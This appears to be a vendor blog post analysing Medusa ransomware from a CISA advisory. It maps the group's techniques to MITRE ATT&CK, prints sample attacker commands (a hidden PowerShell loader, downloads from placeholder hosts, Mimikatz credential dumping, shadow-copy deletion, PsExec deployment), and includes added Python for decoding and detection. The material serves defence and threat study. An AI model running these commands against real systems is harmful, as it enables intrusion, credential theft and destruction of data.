Medusa Ransomware Analysis, Simulation, and Mitigation - CISA Alert AA25-071A
On March 12, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on Medusa ransomware [1]. Medusa ransomware emerged as Ransomware-as-a-Service in June 2021 and gained infamy by compromising over 300 victims from critical infrastructure sectors, including healthcare, insurance, technology, manufacturing, and legal.
In this blog post, we explain the Tactics, Techniques, and Procedures (TTPs) used by Medusa ransomware and how organizations can defend themselves against Medusa ransomware attacks.
Medusa Ransomware-as-a-Service Group
Medusa is a ransomware-as-a-service (RaaS) group that has been active since June 2021. Initially, Medusa operated as a closed ransomware variant controlled by a single group, but it later evolved into an affiliate-based model. Despite this shift, the core Medusa developers still retain control over important operations like ransom negotiations. Medusa threat actors employ a double extortion strategy, where they encrypt victim data and threaten to release it publicly unless the ransom is paid.
The group primarily targets organizations across various critical infrastructure sectors, including healthcare, insurance, technology, manufacturing, and legal. Their victims range from large enterprises to smaller businesses, demonstrating a broad and opportunistic targeting approach.
Medusa's motivations are primarily financial. Their ransom demands vary widely, with some victims required to pay millions of dollars to regain access to their data. They also engage in direct negotiation tactics, contacting victims via phone or email to increase pressure. Additionally, Medusa actors operate a data leak site where they auction stolen data to third parties before the ransom deadline expires. In some cases, victims who pay the ransom have been targeted again with further extortion attempts, suggesting that Medusa actors may engage in triple extortion tactics.
The group's modus operandi involves infiltrating a network, identifying valuable data, and deploying ransomware to encrypt files. Medusa affiliates gain initial access through multiple techniques, often relying on initial access brokers (IABs) who sell access to compromised networks. These brokers use phishing campaigns to steal credentials and exploit unpatched software vulnerabilities; known exploits include vulnerabilities in remote access tools such as ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet EMS (CVE-2023-48788). Once inside, the attackers use living-off-the-land binaries (LOLBins) and legitimate tools like Advanced IP Scanner and SoftPerfect Network Scanner for network discovery and lateral movement, and they rely on living-off-the-land (LOTL) techniques, abusing built-in Windows tools such as PowerShell and Windows Management Instrumentation (WMI), to evade detection. They also attempt to disable security software using bring-your-own-vulnerable-driver (BYOVD) techniques. Exfiltrated data is stored on Medusa-controlled servers and is used to pressure victims into paying the demanded ransom.
Medusa Ransomware Analysis and MITRE ATT&CK TTPs
Initial Access
T1190 Exploit Public Facing Applications
Medusa threat actors exploit unpatched software vulnerabilities to gain initial access to target environments. Organizations are advised to apply patches promptly to mitigate this risk.
Affected Product | Vulnerability | CVSS Score
--- | --- | ---
ConnectWise ScreenConnect | CVE-2024-1709 | 10.0 (Critical)
Fortinet EMS | CVE-2023-48788 | 9.8 (Critical)
T1566 Phishing
Medusa affiliates frequently use phishing campaigns to steal user credentials and gain access to target environments. These campaigns often involve deceptive emails with malicious attachments or links leading to credential-harvesting websites.
Execution
T1059.001 Command and Scripting Interpreter: PowerShell
Medusa threat actors use the PowerShell command given below to execute malicious scripts and establish persistence. The command runs with a hidden window and the execution policy bypassed, base64-decodes and gzip-decompresses an embedded payload, and executes the result in memory so that no script file touches disk.
powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('<base64_payload>'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
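As an added example (not from the post or the CISA advisory), the Python below handles this loader pattern from the analyst's side: it flags the command-line shape and recovers the gzip-compressed, base64-encoded script that would have run in memory, without executing anything. The embedded payload is a constructed harmless script, not Medusa's; the function names are mine.

```python
import base64
import gzip
import re

# Constructed sample, not a real Medusa payload: a harmless script encoded the
# way the loader above expects (gzip, then base64) and spliced into that command.
SAMPLE_SCRIPT = "Write-Output 'constructed sample payload'\n"
SAMPLE_B64 = base64.b64encode(gzip.compress(SAMPLE_SCRIPT.encode())).decode()
SAMPLE_CMDLINE = (
    "powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create("
    "(New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream("
    "(New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('"
    + SAMPLE_B64 +
    "'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
)

_B64_ARG = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")

def is_gzip_base64_loader(cmdline: str) -> bool:
    """Flag the loader shape: a base64 blob fed through GzipStream/Decompress
    and handed to a scriptblock, i.e. decode-in-memory-then-run."""
    lowered = cmdline.lower()
    return all(token in lowered for token in
               ("frombase64string", "gzipstream", "decompress", "scriptblock"))

def recover_payload(cmdline: str) -> str:
    """Undo the loader's encoding (base64 -> gunzip) so the script that would
    have run in memory can be read. Nothing here executes the result."""
    match = _B64_ARG.search(cmdline)
    if not match:
        raise ValueError("no FromBase64String('...') argument in command line")
    blob = base64.b64decode(match.group(1))
    if blob[:2] != b"\x1f\x8b":  # gzip magic; anything else is not this loader
        raise ValueError("decoded blob is not gzip data")
    return gzip.decompress(blob).decode("utf-8", errors="replace")

if __name__ == "__main__":
    print("loader pattern:", is_gzip_base64_loader(SAMPLE_CMDLINE))
    print("recovered script:", recover_payload(SAMPLE_CMDLINE))
```

The same decode step applies to a command line pulled from a Sysmon Event ID 1 or Security 4688 record, as long as the base64 argument survived logging intact.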
T1059.003 Command and Scripting Interpreter: Windows Command Shell
Medusa threat actors utilize the Windows Command Shell (cmd.exe) to execute malicious commands, perform reconnaissance, disable security defenses, and deploy ransomware across victim networks.
cmd.exe /c net share
T1047 Windows Management Instrumentation
Medusa actors abuse WMI to gather information about system processes, users, and network configurations. The command below extracts printer configurations, which can be useful for identifying networked devices.
wmic printer get caption,name,deviceid,drivername,portname
wmic printjob
Persistence
T1136.002 Create Account
Medusa actors create new user accounts to maintain persistence. The command below creates a new user account with administrative privileges.
net user /add default <password> /domain
Defense Evasion
T1070.003 Indicator Removal: Clear Command History
To avoid detection, Medusa actors delete traces of their activities by erasing PowerShell command line history. The command below deletes the PowerShell command history file, making forensic investigations more difficult.
powershell Remove-Item (Get-PSReadlineOption).HistorySavePath
T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
Medusa actors obfuscate scripts and payloads to evade detection by security tools. They manipulate PowerShell and batch scripts to hide malicious commands. This technique splits and concatenates a command to bypass signature-based detection.
powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<malicious_file>.msi)
T1562.001 Impair Defenses: Disable or Modify Tools
Medusa threat actors modify Windows Firewall rules to allow inbound RDP connections on TCP port 3389.
netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow
Discovery
T1046 Network Service Discovery & T1016 System Network Configuration Discovery
Medusa threat actors use legitimate administrative tools to identify active hosts, open ports, and services running on the victim's network. They also use network scanning tools like Advanced IP Scanner and SoftPerfect Network Scanner to map the internal network. The command below retrieves detailed network configuration, including IP addresses, gateway settings, and DNS servers.
netstat -a
T1135 Network Share Discovery
Medusa actors identify shared network drives to spread ransomware and steal data. The command below lists available network shares on a remote system.
net share
T1082 System Information Discovery
Medusa actors collect system details such as OS version, installed software, and system architecture. The command below gathers detailed system information to tailor attacks.
systeminfo
echo Computer: %COMPUTERNAME%
echo Username: %USERNAME%
echo Domain: %USERDOMAIN%
echo Logon Server: %LOGONSERVER%
echo DNS Domain: %USERDNSDOMAIN%
echo User Profile: %USERPROFILE%
echo System Root: %SYSTEMROOT%
driverquery
T1069.002 Permission Groups Discovery: Domain Groups
Medusa actors enumerate Active Directory domain groups to identify privileged accounts. The command below lists members of the Domain Admins group, which can be targeted for privilege escalation.
net group "Domain Admins" /domain
Credential Access
T1003.001 OS Credential Dumping: LSASS Memory
Medusa affiliates use Mimikatz to dump credentials from the Local Security Authority Subsystem Service (LSASS), allowing them to escalate privileges and move laterally within the network. The command below extracts plaintext passwords and NTLM hashes from LSASS memory.
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
Lateral Movement
T1072 Software Deployment Tools
Medusa threat actors use software deployment tools like PDQ Deploy and BigFix to distribute ransomware across networks.
T1021.001 Remote Services: Remote Desktop Protocol
Medusa threat actors use compromised credentials to access systems via RDP, enabling them to move laterally within the victim's network.
mstsc.exe /v:{hostname/ip} /u:{user} /p:{password}
Exfiltration
T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
Medusa threat actors use rclone to exfiltrate their victims' sensitive data to Medusa C2 servers.
Command and Control
T1071.001 Application Layer Protocol: Web Protocols
Medusa threat actors use HTTPS to communicate with command-and-control (C2) servers and exfiltrate data.
T1219 Remote Access Software
Medusa threat actors use legitimate remote access tools like AnyDesk to maintain control over compromised systems.
T1105 Ingress Tool Transfer
Medusa threat actors transfer malicious tools and payloads into victim environments to facilitate their operations, including credential dumping, remote access, and ransomware deployment. They often use certutil, PowerShell, and PsExec to download and execute tools while evading security controls.
certutil -f urlcache https://<domain>/<remotefile>.css <localfile>.dll
Impact
T1486 Data Encrypted for Impact
Medusa ransomware encrypts victim data using AES-256 encryption and appends the .medusa extension to affected files. The encryptor process, gaze.exe, is deployed to encrypt files and drop ransom notes.
psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "c:\gaze.exe"
T1490 Inhibit System Recovery
Medusa threat actors delete volume shadow copies to prevent recovery.
vssadmin delete shadows /all /quiet
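Pulling the command lines from the TTP sections above together, here is an added detection example (not from the post, the advisory, or Picus): Python that folds PowerShell string concatenation back together and then matches process-creation command lines against one rule per TTP. The events are constructed from the commands in this post with the post's own placeholders left in, and the rule names and patterns are mine.

```python
import re
# Constructed process-creation command lines (the shape of a Sysmon Event ID 1
# or Security 4688 record) built from the commands in this post; not real logs.
SAMPLE_EVENTS = [
    "vssadmin delete shadows /all /quiet",
    'netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow',
    "powershell Remove-Item (Get-PSReadlineOption).HistorySavePath",
    "powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression "
    "(New-Object Net.WebClient).$x.Invoke(http://<ip>/<malicious_file>.msi)",
    "certutil -f urlcache https://<domain>/<remotefile>.css <localfile>.dll",
    'psexec.exe -accepteula -nobanner -s \\\\{hostname/ip} cmd /c "c:\\gaze.exe"',
    "net user /add default <password> /domain",
    'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"',
    "powershell -nop -c Get-ChildItem C:\\Temp",  # benign control: must not match
    "net share",                                  # too common to alert on alone
]

# 'a' + 'b' -> 'ab'; applied one pair at a time until no concatenation is left.
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

def normalize(cmdline: str) -> str:
    """Fold split-and-join obfuscation back together and lower-case, so
    'D' + 'Own' + 'LOa' + 'DfI' + 'le' is matched as downloadfile."""
    while _CONCAT.search(cmdline):
        cmdline = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", cmdline, count=1)
    return cmdline.lower()

# One rule per TTP shown above; each pattern runs against the normalized text.
RULES = {
    "T1490 shadow copy deletion": re.compile(r"vssadmin\s+delete\s+shadows"),
    "T1562.001 inbound RDP firewall rule": re.compile(r"advfirewall.*add rule.*localport=3389.*action=allow"),
    "T1070.003 PowerShell history wiped": re.compile(r"remove-item.*historysavepath"),
    "T1027.013 obfuscated download + Invoke": re.compile(r"(downloadfile|downloadstring).*invoke"),
    "T1105 certutil urlcache download": re.compile(r"certutil.*urlcache.*https?://"),
    "T1486 gaze.exe pushed via PsExec": re.compile(r"psexec.*\s-s\s.*gaze\.exe"),
    "T1136.002 domain account created": re.compile(r"net\s+user\s+/add.*/domain"),
    "T1003.001 LSASS dump with Mimikatz": re.compile(r"sekurlsa::logonpasswords"),
}

def classify(cmdline: str) -> list[str]:
    """Return the names of every rule the normalized command line matches."""
    text = normalize(cmdline)
    return [name for name, rx in RULES.items() if rx.search(text)]

def triage(events: list[str]) -> dict[str, list[str]]:
    """Group matching command lines under the rule that fired on them."""
    hits: dict[str, list[str]] = {}
    for event in events:
        for name in classify(event):
            hits.setdefault(name, []).append(event)
    return hits
```

Running `triage(SAMPLE_EVENTS)` fires each of the eight rules exactly once and leaves the two control lines unmatched; in production the same patterns would run over the command-line field of your EDR or SIEM process events.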
How Picus Helps Simulate Medusa Ransomware Attacks
We also strongly suggest simulating Medusa ransomware attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other ransomware variants, such as HellCat, Ghost, and Black Basta, within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for Medusa ransomware:
Threat ID | Threat Name | Attack Module
--- | --- | ---
31340 | Medusa Ransomware Campaign | Windows Endpoint
72791 | Medusa Ransomware Download Threat | Network Infiltration
66692 | Medusa Ransomware Email Threat | Email Infiltration (Phishing)
Picus also provides actionable mitigation content. The Picus Mitigation Library includes prevention signatures for Medusa ransomware and other ransomware attacks in preventive security controls. Picus Labs has validated the following signatures for Medusa ransomware:
Security Control | Signature ID | Signature Name
--- | --- | ---
Check Point NGFW | 0920BA626 | Ransomware.Win32.Medusa.TC.5a8fkYQw
Check Point NGFW | 0F31EFFFA | Ransomware.Win32.Medusa.TC.de3cwwcz
Check Point NGFW | 0B7282E76 | Trojan.Win32.Imps.TC.bfb4UCRQ
Check Point NGFW | 090BB1A2E | Ransomware.Win32.Medusa.TC.b20eAyZa
Check Point NGFW | 0808FEF5A | Ransomware.Win32.Medusa.TC.2d62ZwaZ
Cisco FirePower | 1.49569.1 | MALWARE-OTHER PowerShell invocation with ExecutionPolicy Bypass attempt
Forcepoint NGFW | | File_Malware-Blocked
Fortigate AV | 10126105 | W32/Filecoder.MEDU!tr.ransom
Fortigate AV | 10127337 | W32/Filecoder_Medusa.A!tr.ransom
Palo Alto | 624270429 | Ransom/Win32.medusa.h
Palo Alto | 572533496 | ransomware/Win32.rents.u
Palo Alto | 624270495 | Ransom/Win32.medusa.j
Palo Alto | 609797718 | ransomware/Win32.medusa.g
Palo Alto | 624270456 | Ransom/Win32.medusa.i
Trellix | 0x4840c900 | MALWARE: Malicious File Detected by GTI
Snort | 1.49569.1 | MALWARE-OTHER PowerShell invocation with ExecutionPolicy Bypass attempt
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
References
[1] "#StopRansomware: Medusa Ransomware," Cybersecurity and Infrastructure Security Agency (CISA). Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a